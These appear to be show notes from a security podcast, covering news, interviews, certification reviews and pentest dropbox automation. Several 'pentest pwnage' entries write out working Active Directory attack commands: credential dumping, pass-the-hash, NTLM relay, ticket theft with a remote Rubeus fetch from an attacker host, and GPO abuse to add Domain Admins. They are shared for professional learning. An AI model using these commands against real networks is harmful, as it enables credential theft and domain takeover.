Today our good pal Christopher Fielder from Arctic Wolf is back for an interview three-peat! He joins Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I to talk about all things ransomware, including: How the Colonial Pipeline incident may have started from a weak VPN cred with no MFA. Silver lining (?) - they got some of the $ back. Was the federal government's response good enough? What should the government be doing to better handle and manage ransomware? Common ways ransomware gets in our environments, and some ways to NOT get ransomware'd: Use 2FA (make sure that all accounts are using it!) Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.President Have users that haven't logged in for X days get automatically locked out Train your users - consider Arctic Wolf's managed security awareness offering Detect early signs of compromise like Kerberoasting Lock down your DNS egress to only specific servers so that it doesn't run "wide open" Leverage good threat intel

Hey everybody, happy June! Our pal Joe is back to cover some great security stories with us, including: Peloton's leaky API Some Colonial Pipeline discussion (story 1, story 2) Amazon Sidewalk doesn't really share your Internet connection with neighbors/strangers. The Hacker News article doesn't do an awesome job of clearing that up either.  

Today we're doing something new - a first impressions episode of Meraki networking gear. Note: this is not a sponsored episode, but rather a follow up to episode #460 where I talked about throwing all my UniFi gear into the ocean and replacing it with Meraki gear. At the end of that episode I asked if anybody was interested in a "first impressions" of the gear, and it turns out (at least 6) people are interested, so here we are! TLDL: Pros Super easy plug-and-play setup The mobile app can control just about everything - ports, SSIDs, Internet on/off timers and more! Verbose logging Top-notch support from experienced technicians Cons Cost! Big $$$ "Cloud only" - can't install this gear in a LAN-only configuration Client VPN is a bit clunky to setup

Hey friends! Today we're talking with Philippe Humeau, CEO of CrowdSec, which is "an open-source massively multiplayer firewall able to analyze visitor behavior & provide an adapted response to all kinds of attacks. It also leverages the crowd power to generate a global IP reputation database to protect the user network." I came into this interview not knowing much at all about CrowdSec, so I peppered Philippe with questions such as: What is CrowdSec? What problem does it solve? Who are your competitors? You're open source...so how do you make $? What's your five-year plan? You're dealing with a lot of data and metrics...how are you handling data privacy laws and concerns such as GDPR? What if I fall in love with CrowdSec and want to contribute to making it better? It was a really fun, transparent and energetic interview - hope you enjoy it!

Today we continue the series on eating your own security dog food! Specifically, we talk about: Keeping a log and procedure for sanitizing systems Keeping a log and procedure for provisioning systems A big "gotcha" to be aware of when using Windows system dropboxes - make sure your Windows user account doesn't expire, because Splashtop doesn't have any way to update it! To prevent this, set the account not to expire: wmic useraccount where "Name='LocalAdminAccount'" set PasswordExpires=false If you want more tips on building pentest dropboxes, check out this series Oh, and today's song that I sang obnoxiously is If I Were a Dog.

Hey everybody! I stayed in a hotel for the first time in over a year and boy oh boy...I hope I didn't get COVID from the bedsheets! Anyhow, on that journey I thought of some things that I think will help your business on the marketing/project management/sales side to be more successful and less annoying. DISCLAIMER: I have no formal training in these areas, but I've been on both sides of the table for a number of years, and I think I'm getting a better idea of what clients do and don't like during the sales process. These things include: Reduce layers of people complexity - don't have 17 of your people on the client intro/pitch call and then ghost them once they actually want to buy something! Keep project management just complicated enough - I like project management tools and spreadsheet task-trackers like Smartsheet but I'm trying to let the client lead as far as how much detail they need when tracking their projects. By default, we create a document with a high level map of project milestones, timelines and key contact information. We update that as often as the client likes. Personalize responses to Web leads - if you have an info@ or sales@ address for your business, I think you should personalize the response you give folks who write in. They wrote you for a reason! Don't just copy/paste some generic "Hey you wanted info about our company so here it is blah blah blah" response, that doesn't make people feel like you give a rip about their needs. Think of something personal to say in the reply. "Oh, I see you're in Minnesota. I'm a big Twins fan!" Something like that. Simple, easy and personal. Don't sign people up for junk without asking - in this episode I give an example of a vendor we looked at (but didn't select) for some services, and the company decided to automatically sign ups up for a bunch of electronic and paper mailings. That's super annoying! Don't stink at LinkedIn - in the last episode of this series, I told you about a guy who (to me) wins LinkedIn and the Internet because he sent me a personalized video LinkedIn invitation - it was awesome! Be more like that guy, and less like the mosquitoes who send invites like "Hi, I noticed you're human and figured we should be LinkedIn BFFs" and then sign you up for a non-stop barrage of sales pitches! Bug people "just enough" - if you've had an awesome scoping call for a potential project and the client has received and reviewed the SOW, stay in touch with them periodically - even if it feels like you're being ghosted.

Welp, I need another security certification like I needed a bunch to the retinas, but even after all the fun (and pain) of CRTP I couldn't help but sign up for the maiden voyage of Attacking and Defending Azure AD Cloud - a.k.a. CARTP. This cert comes to us from our friends over at Pentester Academy, and is all about pwning things in Azure AD which is mostly new ground for me. I this episode I talk about some of the TTPs covered in week 1 of this course, as well as: Likes: Courses offered on Saturday (I'm usually pooped for these sessions, but it's easier than taking time during the work week) Student portal - and especially the student guide! - is more polished, easy to read, and easy to copy/paste from. Dislikes: On Saturdays I'm a sleepy Brian. :-) I still wish the course was designed such that we would go through various hands-on-keyboard exercises with the instructor, not just watch. Use of Discord as main comms channel - it causes anxiety for me...too many blips and bloops and blurps with all the notifications. It's also frustrating that the instructor takes questions from Discord sometimes without repeating the question, thus making it hard to figure out what everybody was talking about if I watch the Zoom reply.

Hey friends!  Today Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I talk about some of our favorite news stories, including: FBI removes hacker back doors NSA: 5 security bugs under active nation-state cyberattack Ubiquiti is accused of covering up a ‘catastrophic’ data breach — and it’s not denying it.  On a side note, enjoy our podcast about how we lost our love for Ubiquiti a while back: 7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean Codecov users warned after backdoor discovered in devops tool

Today our friend Christopher Fielder of Arctic Wolf joins us on the show again (check out his first appearance in episode #444 - this time to talk about the security journey, and how to start out in your "security diapers" and mature towards a stronger infosec program. Specifically, we talk about: When the company has one person in charge of IT/security, how can you start taking security seriously without burning this person out? First, it's probably a good idea to take note of what you have as far as people, tools and technology to help you meet your security goals. Early in this process, you should inventory what you have (see CIS controls) so you know what you need to protect. A few tools to help you get started: Nmap Rumble LanSweeper Witnessme As you go about any phase of your security journey, don't ever think "I'm good, I'm secure!" Quarterly/yearly vulnerability scans just won't cut it in today's threat landscape - especially your external network. Consider scanning it nightly to catch show-stoppers like Hafnium early) Limiting administrative privileges is SUPER important - but don't take our word for it, check out this report from Beyond Trust for some important stats like "...enforcing least privilege and removing admin rights eliminates 56% of critical Microsoft vulnerabilities." Install LAPS, because if an attacker gets local admin access everywhere, that's in many ways just as good as Domain Admin! Train your users on relevant security topics. Then train them again. Then....again. And after that? Again. There are many ways to conduct tabletop exercises. They don't have to be crazy technical. Start with the internal tech teams, practice some scenarios and get everybody loosened up. Then add the executives to those meetings so that everybody is more at ease. How do you know when it's time to ask for help from an outside security resource? Not sure what kind of shape your company's security posture is in? Check out Arctic Wolf's free security maturity assessment.

In the last two episodes of this series (#449 and #450) we've been diving into how to not only speed up the process of spinning up a DIY pentest dropbox, but how to automate nearly the entire build process! In today's episode we talk specifically about how to streamline the Windows 10 build process. As previously mentioned, this article is awesome for creating a core Win 10 answer file that will format C:, setup a local admin, login once to the configured desktop and then do whatever things you want it to do. Personally, I like having a single batch file get fired off that: Sets the timezone with tzutil /s "Central Standard Time" Stops the VM from falling asleep with powercfg.exe -change -standby-timeout-ac 0 Grabs and runs a PS file that does a ton of downloading and unzipping of files with: invoke-webrequest https://somesite/somefile.zip -outfile c:\somewhere\somefile.zip expand-archive c:\somewhere\somefile.zip -destinationpath "c:\somewhere\extracted\" Installs Windows updates with: Install-PackageProvider -name nuget -force Install-Module PSWindowsUpdate -force Import-Module PSWindowsUpdate Get-WindowsUpdate Install-WindowsUpdate -AcceptAll -IgnoreReboot Sets a new name for the machine: Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so" Rename-Computer -LocalCredential administrator -PassThru Write-Host "New name accepted!" Does a set of actions depending on the IP range with this code (which sets the IP address to a variable and then does stuff if the machine sits in that subnet): $ip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1] f ($ip -like "192.168.0.*") { Invoke-Webrequest https://somesite/somefile.ps1 -OutFile c:\someplace\somefile.ps1 } Also, I talk in this episode about how I try to host these "seed" files as securely as possible using Amazon Lightsail instances, the built-in firewall, and LetsEncrypt.

Today we talk through our first engagement using Hak5 Key Croc to steal and exfil data. In the past, my internal monologue when a new Hak5 toy is released sounds like this: "I certainly don't need another Hak5 doo-dad! The last one didn't ever work that great, and ended up in a drawer full of past Hak5 doo-dads that didn't work that great." "Whaaaaat? A new cool and hip video for the INSERT_CATCHY_HAK5_TOOL_NAME is out? Pffft. I don't need that." 5 seconds go by... "Well it's just $100, shut up and take my money!" "It came in the mail today! It has a cool envelope and everything!" "Hrm, I followed the quick start video and 3 of the 10 steps don't work for me. I'll hit the forums. Huh, everybody seems to be having this problem. 5 days go by... "Neat! With a little help from SassyGal67 and StarWarsFreak_XXL on the forums, I hacked together my own fix for these issues. Now the core functionality of the device works, but the GUI is totally broken and you have to factory reset it with every use. Cool!" Deep breath. Tosses doo-dad in a drawer full of past Hak5 doo-dads that didn't work that great. So with all that said, was our experience with the Key Croc any different? Check out today's episode to find out!

OK I probably say this every time, but I'm gonna say it again: this tale of pwnage is my one of my favs - and not because of the tools/tradecraft, but because of why the company needed our help in the first place. I think I'd file this under the category of "rescue and recovery mission" more than a pentest, but it was a total blast. I also cover a few tangents, including how COVID shot #2 gave me nightmares about leprechauns and indirectly caused me to de-pants in front of a large Webinar audience.

Hey friends! Warning: this is not a "typical" 7MS episode where we try hard to deliver some level of security value. Instead, today is a big, fat, crybaby, first-world problems whine-fest about how I used to love my UniFi gear for many years, but then a few weeks ago I hit unhealthy levels of rage while working with it...and subsequently completely ripped it all out of the wall and threw it in a plastic bin. Let me say it one more time: if you don't like rants of rage, skip this episode and we'll see you next week!. If you want to hang in for this clown show, you'll be treated to some of the following highlights: How I did not pirate Boson NetSim How I fell in love with the Edge Router X as an up-and-coming network guru The schedule isn't up, but I'm speaking at Secure360 this year! My shiny new Dream Machine had a really fun issue where one morning Internet service was dead (even though config hadn't changed in weeks), and restoring the SAME config over the RUNNING config fixed the issue. Whaaahhhh? The Dream Machine GUI (at the time) doesn't have all the options one might need to stand up a site to site VPN. Neat. After a firmware update, my wifi started going down from 8:00 a.m. - 8:07 a.m. every morning. Were one of you hacking me? WERE ONE OF YOU HACKING ME! Once I got a BeaconHD, I got a new fun issue where if you were connected to it and submitted a wifi voucher, the Beacon wouldn't properly recognize it and let you on the Internet until about 5 minutes later. Guests loved that! And by "loved that" I mean "hated that." After upgrading UDM firmware again, a new nifty issue popped its head up which broke all my inter-VLAN rules. Yay! I threw hundreds of dollars at new UniFi switches and access points to solve all these problems, and everything worked perfectly (until it didn't).

Happy mid-March! Our good pal Gh0sthax joins us today for another hot dish of cyber news! Stories include: Microsoft Exchange cyber attack - Hacker News has a nice what we know so far story, but things have evolved really fast, so make sure you check Microsoft's primary advisory, the script to run on local servers and newer updates such as the recent one-click remediation for unsupported Exchange versions SonicWall zero day - yuck, looks like the SonicWall troubles we talked about recently were a true zero day. In contrast to the Exchange story, it looks like SonicWall's official response offers (frighteningly?) little by way of logs and forensics to tell if you were truly popped. Either way, be sure to patch! Hackers attempt to contaminate Florida town's water supply - the story itself is interesting, but the way it got picked up by some outlets seems to send the message of "TeamViewer = bad" but we think the true lessons learned here are: Out of date and/or unsupported OS = bad Weak credentials = bad Connecting this type of equipment directly to the Internet instead of MFA + VPN = bad CISA has a great breakdown of this incident as well. Webshell use has doubled since last year - this article brings back some happy/frustrating OSCP experiences. To better protect your org from being pwned with Web shells, check out NSA's list of vulnerabilities commonly exploited to plant web shells Some great feedback from the last cyber news episode - a podcast listener offered a different take on the "sudo bug that gives root access story" that we discussed last month.   

Today we're super excited to share a featured interview with Tanya Janca of WeHackPurple! Tanya has been in software development from the moment she was of legal age to work in Canada - beginning by working with some huge companies (Nokia/Adobe) before falling in love with application security and eventually starting a company of her own.  Gh0sthax and I sat down with Tanya over Zoom to discuss: How to overcome your fears and present at conferences, write blog posts and even start your own company! How to deal with online jackwagons who troll you online at conferences The importance of finding a mentor and mentoring others Also, here are a bunch of handy links and hashtags Tanya shares throughout the interview: Bob and Alice Learn Application Security - Tanya's book, available on Amazon Women of Security (WoSEC) We Hack Purple Podcast - weekly podcast with a diverse range of guests from all walks of infosec life We Hack Purple Community - "a Canadian company dedicated to helping anyone and everyone create secure software." Tanya's music on Spotify #CyberMentoringMonday - a hashtag that Tanya and other security professionals monitor to help people connect with cyber mentors InsiderPHd - has a safe space for bug bounty hunters to learn and collaborate WeAreHackerz - "You are welcome to join WeAreHackerz if you identify as a person of a marginalized gender, including but not limited to non-binary individuals, women (trans and cis), trans men, genderqueer, etc. We welcome members across all nationalities, races, religions, ages, or other characteristics that make each of us unique." Security in Color  

Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence: Get a cmd.exe spun up in the context of your AD user account: runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe" Then get some important info in PowerView: Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win! Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win! Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access! Once you know where you have local admin access, lsassy is your friend: lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server Did you get an admin's NTLM hash from this dump? Then do this: crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED (Pwn3d!) FTW!  

Hello friends!  Today, Joe (Gh0sthax) and I complete our series on CRTP - Certified Red Team Professional - a really awesome pentesting training and exam based squarely on Microsoft tools and tradecraft.  Specifically, Joe and I talk about: We don't think the training/exam is for beginners, despite how its advertised Both the lab PDF and PowerPoint have their own quirks - which may ultimately be teaching us not to be copy-and-paste jockeys, and instead build our own study guides and cheat sheets Don't let the training give you the idea that most pentests have a super fast escalation path to DA (ok yes sometimes they do, but usually we spend a LOT of hours working on escalation!) Watch the walkthrough videos.  We repeat: WATCH THE WALKTHROUGH VIDEOS! Although not required, we highly recommend capturing all the flags laid out for you in the lab environment Know how to privesc - using multiple tools/methods It would be to your advantage to understand how to view/manipulate Active directory information in multiple ways You start the exam with no tools.  So how will you be ready to upload/download tools into the exam environment so you make the most of your exam time? Tool X might give you wrong results - or none at all - in the lab.  Do you have a backup tool Y and Z that can serve the same purpose? You want to be very good at Kerberos ticket crafting! Know all the mimikatz commands and switches and when to apply them

Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because: I got to use some of my new CRTP skills! Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users: Get-DomainUser -PreauthNotRequired Check for misconfigured LAPS installs with Get-LAPSPasswords! The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective! When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies! SharpShares is a cool way to find shares your account has access to. I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example: sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin! Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun! Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)

Happy almost-mid-February! Today Gh0sthax cooked up some great news stories for us to chew on, including: Sudo bug gives root access to mass numbers of Linux systems! What the heck is hammering with GameStop stock? - this tweet does a great job of explaining it in plain English Solarwinds continues to be a gift that keeps on giving malware-laced gifts that people don't want Sonicwall was hacked using zero days in its own products. After recording this news segment, Sonicwall issued an updated statement on the situation

Today's featured interview is with Marcello Salvati of Black Hills Information Security. Marcello is a.k.a. byt3bl33d3r, and known for his many contributions to the security community. We here at 7MS first became familiar with his work after using CrackMapExec on our penetration tests, and today we sat down with Marcello to discuss: Brian's Chris Farley moment with Marcello Marcello's infosec origin story CrackMapExec, how it came to be, how it was named, and what's coming in the new version of CME Marcello's decision to create Porchetta Industries as a community to provide "support to open source infosec/hacking tool developers and helps them succeed with their own Github sponsorships." Marcello welcomes you to follow Porchetta Industries on Twitter and Discord. What does Marcello do when he's not pentesting and coding? And does he ever get tired of pentesting and coding? What the heck is Nim and why is Marcello so excited about OffensiveNim?

Hey everyone! Hope you're having a great week. Today Gh0sthax and I do a brain dump and recap of a cool (and mind-exploding) course we took last week called Enterprise Attacker Emulation and C2 Implant Development. In the tangent department, we also touch a bit on: The Fargo TV series Our upcoming interview with Marcello (a.k.a. byt3bl33d3r) from BHIS This Key and Peele sketch I just took my CRTP exam, which we've talked about a lot in the past 7MS is trying to up its pentest game by learning how to write beacons/implants. One project that's really cool in this respect is from MrUn1k0d3r

Today we talk about a cool product called Deep Freeze, which, as its name implies, can "freeze" your computer in a known/good/frozen state. Then you can do whatever the flip you want to the machine (install icky things, tamper with C:\windows, pack your browser full of shady plugins, and more!), and then just reboot to restore! Note: this is not a sponsored episode, but will probably sound like one because I really dig this product and think you might too :-)

Hey friends! We're continuing our series on pentest dropbox building - specifically playing off last week's episode where we started talking about automating the OS builds that go on our dropboxes. Today we'll zoom in a little closer and talk about some of the specific scripting we do to get a Windows 2019 Active Directory Domain Controller installed and updated so that it's ready to electronically punch in the face with some of your mad pentesting skills! Specifically, we talk about these awesome commands: tzutil /s "Central Standard Time" - this is handy to set the time zone of your server build powercfg.exe -change -standby-timeout-ac 0 will stop your VM from falling asleep Invoke-WebRequest "https://somesite/somefile.file" -OutFile "c:\some\path\somefile.file" is awesome for quickly downloading files you need. Couple it with Expand-Archive "C:\some\path\some.zip" "c:\path\to\where\you\want\to\extract\the\zip" to make auto-provisioning your toolkit even faster! Don't like it that Server Manager loves to rear its dumb head upon every login? Kill the task for it with Get-ScheduledTask -TaskName ServerManager | Disable-ScheduledTask -Verbose. Byeeeeee!!!! I love Chrome more than I love IE/Edge, so I auto install it with: $Path = $env:TEMP; $Installer = "chrome_installer.exe"; Invoke-WebRequest "http://dl.google.com/chrome/install/375.126/chrome_installer.exe" -OutFile $Path\$Installer; Start-Process -FilePath $Path\$Installer -Args "/silent /install" -Verb RunAs -Wait; Remove-Item $Path\$Installer Now get all the Windows updates! Install-PackageProvider -name nuget -force Install-Module PSWindowsUpdate -force Import-Module PSWindowsUpdate Get-WindowsUpdate Install-WindowsUpdate -AcceptAll -IgnoreReboot Then rename your machine: Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so" Rename-Computer -LocalCredential administrator -PassThru Write-Host "New name accepted!" When you're ready to install Active Directory, you can grab the RSAT tools: Write-Host "Lets install the RSAT tooleeeage!" add-windowsfeature -name rsat-adds And then the AD domain services themselves: Write-Host "Now lets install the AD domain services!" add-windowsfeature ad-domain-services Then install the new forest: install-addsforest -domainname your.domain -installdns -DomainNetbiosName yourdomain  

Happy new year! This episode continues our series on DIY pentest dropboxes with a focus on automation - specifically as it relates to automating the build of Windows 10, Windows Server 2019, Kali and Ubuntu VMs. Here's the resources I talk about in more detail on today's episode that helps make the automagic happen: Windows VMs This article from Windowscentral.com does a great job of walking you through building a Windows 10 unattended install. A key piece of the automation is the autounattend.xml file, which you can somewhat automatically build here, but I think you'll want to install the Windows System Image Manager to really get in the tech weeds and fully tweak that answer file. The handy AnyBurn utility will help you make ISOs out of your Windows 10 / Server 2019 customized builds. Ubuntu VMs I set out to build a Ubuntu 18.x box because Splashtop only supports a few Linux builds. I found a freakin' sweet project called Linux unattended installation that helps you build the preseed.cfg file (kind of like the Windows equivalent of an answer file). The area of preseed.cfg I've been spending hours dorking around with is: d-i preseed/late_command string \ Under this section you can customize things to your heart's content. For example, you could automatically pull down and install all OS packages/updates and a bunch of third party utils you want: in-target sh -c 'apt-get update'; \ in-target sh -c 'apt-get upgrade -y'; \ in-target sh -c 'apt-get install curl dnsrecon git net-tools nmap openssh-server open-vm-tools-desktop python3.8 python3-pip python-libpcap ubuntu-gnome-desktop unzip wget xsltproc -y'; \ Finally, the project provides a slick script that will wrap up your Ubuntu build plus an SSH key into a ready-to-go ISO: build-iso.sh ~/.ssh/id_rsa.pub ~/Desktop/My-kool-kustomized-Ubuntu.iso Awesome! Kali VMs There is some decent documentation on building a preseed.cfg file for Kali. But the best resource I found with some excellent prebuilt config file is this kali-preseed project. Once your seed file is built, it's super easy to simply host it on a machine in your network and let Kali pull it during install. For example, if you've got a Linux box with Python on the network at 192.168.0.7, just make a temporary folder with the preseed.cfg file in it and then run: sudo python3 -m http.server 80 Then, in your virtual environment, create a new VM and boot it to a Kali NetInstaller image. At the splash screen, hit Tab and it'll display a command line you can edit. Remove the line that says something like preseed/file=/cdrom/simple-cdd/default.preseed, add auto=true and then the URL path to your preseed file, such as url=http://192.168.0.7/preseed.cfg. The Kali will ask for a few questions, such as a username and hostname to configure, and then if you're watching your machine hosting preseed.cfg, you'll see your Kali machine grab the config file and take care of the rest from there! Got a better/cooler/funner/faster/awesomer way to do this type of automation? Let us know!

Today, Gh0sthax and I talk about week 3/4 of the CRTP - Certified Red Team Professional training, and how it's kicking our butts a bit. Key points include: We agree this is not a certification for folks who are new to pentesting Don't expect to be following along "live" with the instructor during the training sessions You'll need to do a flippin' ton of studying and practicing on your own in between the live sessions As you follow along with the lab exercises, some things won't work - and that might be by design, but the lab manual might not give you a heads-up. In those cases, be sure to check with your classmates in the Discord channel Problems popping shells? Hint: it might not be a problem with your tools...but with your network/firewalll config! The more PowerShell skills you can walk into this training with, the better. We've got to play with some tools that were new(ish) to us: PowerUpSQL - check out these awesome cheat sheets too! HeidiSQL Rubeus If you're an absolute rockstar in the pentest labs, don't think that you'll breeze right through the exam! Some pros of this training: fast-moving, super knowledgable instructor. Outstanding content. Super value for the dollar investment - arguably the best pentest training bang for the buck. The labs themselves are quite good and realistic. You get the recordings of the live sessions after they're complete. The course covers some defense against these attacks as well - great to have the blue team perspective! A few cons: the content might be too fast-moving. It can get easy to become "lost" and forget the objective of what each lab exercise is having you do. Lab manual doesn't necessarily match the PDF slides.  

Merry Christmas! Happy holidays! Please enjoy the last cyber news edition of 2020, brought to us by our good pal Gh0stHax. Stories covered include: You've probably heard this by now, but FireEye had a breach that was truly sophisticated. Here's a really nice plain English breakdown of the situation for folks who may not be interested in the deep technical details. Chris Krebs, former CISA director, sues Trump campaign lawyer after death threats CSOOnline has a nice article on 4 security trends to watch for in 2021 which we may or may not agree with!  

Today's episode continues part 1 of our series on the Certified Red Team Professional certification. Key points from today's episode include: It's probably a better idea to run Bloodhound on your local machine so you don't crush the student VM's resources Running Invoke-Command is one of my new favorite things. Check this post for a bunch of cheatsheet tips for running commands in PowerShell against other hosts. Silver, gold and skeleton key attacks in AD - are they awesome? Yes? Do I see myself using those in short-term pentest enagements? Meh. Wanna build a home lab to do some of these fun pentest stuff? Our buddy k3nundrum in Slack recommended we check out this. It looks awesome. And the devs of the tool have a video on it here. When you're popping shells and privs all over the place in the lab, it can be confusing to figure out which machines you have what privileges on. I like using the klist command. Or, from a mimikatz prompt, try kerberos::list /export.  

Welp, I need another certification like I need a hole in the head, but that didn't stop me from signing up for the Certified Red Team Professional. So I've started a series on sharing what I'm learning as I proceed through the certification path. (We're also talking about this on the 7MS forums) Here are some of the highlights from week 1: Boy oh boy is PowerView handy for extracting juicy info out of Active Directory. It works well when served with a side order of the Microsoft signed DLL for the ActiveDirectory PowerShell module I wouldn't say this course is for beginners. You will get some high level intro to PowerShell, Active Directory and pentesting, but you will need to do a ton of self-study and banging around in the lab to fill in some skill gaps. When trying to pop a Jenkins box, I learned about a few new helpful tools I'd never played with before: HFS - simple HTTP file server Powercat - for catching shells! Then on a personal front, I have a few updates to share as well: The Thanksgiving surprise that brought tears to my eyes The new piece of exercise equipment in the Johnson household that made my wife reach for a barf bag A mysterious sound in the house that lead to the discovery of dead things over Thanksgiving break

Happy December! Today I virtually sat down with Christopher Fielder of Arctic Wolf, who started his career in security at 18 (I was just playing a lot of video games when I was that old)! Christopher has served in the Air Force, worked for a university and SANS, served for some three-letter organizations - and more! Christopher and I had a great chat about a variety of security topics, including: Threat hunting - why it's a term that means so many things to different people, how to get started in it and how to start building a threat hunting team Threat intel - its relationship to threat hunting, and how to make sense of the jillions of intel feeds out there Pentesting your MDR/SIEM - we talk about our gist on evaluating an MDR/SIEM, and how to throw some technical tests at these systems to figure out if they're worth the cost!

Happy Thanksgiving! While the turkey and pie settle in your belly, why not also digest some fantastic security news stories with our pal Gh0sthax? Today's stories include: It was another epic month of patching - both Threatpost and Krebs have great coverage of what you need to know. We don't support software pirating, but it's interesting that we just got a demo of Cobalt Strike spun up, and now the source code was leaked. Always download software updates from their source, not from not-so-trustworthy sources like random search results in Google and pop-up boxes. As a follow up to a story from last month, ransomware was not to blame for the death of a woman in Germany.

Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features: Great blue team tools alerting our customer to a lot of the stuff we were doing An EDR that we tried to beat up (but it beat us up instead) SharpGPOAbuse which we talked about extensively last week Separation of "everyday" accounts from privileged accounts Multi-factor authentication bypass! Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation. The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds: SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with: echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight. We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!

Hello friends! Sorry to be late with this episode (again) but we've been heads-down in a lot of cool security work, coming up for air when we can! Today's episode features: A little welcome music that is not the usual scatting of gibberish I torture you with Some cool tools I'm playing with in the lab that we'll do future episodes on in the future: DetectionLab to practice detecting all the bad things! BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want. Cobalt Strike - we're doing a demo right now! Most of today's episode focuses on SharpGPOAbuse, a tool that can be used to abuse "generic write" access to GPOs (which you might identify after running BloodHound). Here's a sample syntax you could run: SharpGPOAbuse.exe --AddUserTask --TaskName "Totes Safe Windoze Updatez" --Author SAMPLECO\ADMINISTRATOR --Command "cmd.exe" --Arguments "/c net group \"Domain Admins\" SomeLowPrivUser /ADD DOMAIN" --GPOName "Name of GPO with Generic Write Access" This will push a ScheduledTasks.xml file to \\sample.company\Policies\LONG-STRING-REPRESENTING-THE-GPO-ID\User\Preferences\ScheduledTasks Now if you find that the task is not pushing correctly, it may be that SharpGPOAbuse.exe hasn't been able to update either the GPT.INI file (in the root of the GPO path) and/or the versionNumber value assigned to the GPO itself. If you need to adjust the versionNumber and GPT.INI value manually, definitely read this Microsoft article so you know how the number is generated and how to increment it properly. This flippin' sweet RastaMouse blog article also helped this click for me. If you can't seem to update versionNumber using the PowerShell in Rasta's article, you can also open up ADSI Edit and navigate to Default naming context > DC=your,DC=com > CN=System > CN=Policies > CN=LONG-STRING-REPRESENTING-THE-GPO-ID then get the properties of the folder, scroll down and manually adjust the value for versionNumber.

Hi! Sorry to be so late with this episode, but I'm excited to share with you another fun tale of pentest pwnage! Key points from today's episode include: We do not do these episodes to brag or put down any company about their security posture. We do do (heh, I said "do do") these episodes to share what we're learning about pentesting it helps you become a better network defender and/or offender! Early in an engagement it can be fruitful to run Pcredz to find goodies in the clear like hashes, CC numbers, SNMP traps and more! Run hashes right through the Hashes.org cracked Pwned Passwords list for more management-level impact on your efforts. Do the same with Kerberoastable accounts Once you've gotten a local or domain admin account, use CrackMapExec to dump a workstation's local hashes, then do something VERY important that I just learned this week (details in today's episode) to maybe get insta-DA!

Happy October and merry Halloween everybody! We're back with our buddy Joe "the machine" Skeen who is also now a Principal Security Engineer for 7MS! He's also working on a new cert, and speaking of certs, 7MS is now PCIP certified! Today's great cyber stories include: Azure AD is a single point of failure in many networks Ransomware sophistication continues to grow - as demonstrated in this story, this one and this one Ransomware such as Ryuk can go from phishing email to total domain domination in 5 hours or less Don't forget to patch - Microsoft remediated some doozies! Something like 0 patch looks particularly interesting to aid in your patching efforts (not a sponsor, but maybe some day ;-) P.S. We've got a Halloween Webinar coming up Friday with our friends at Netwrix - sign up and we'll see you there!

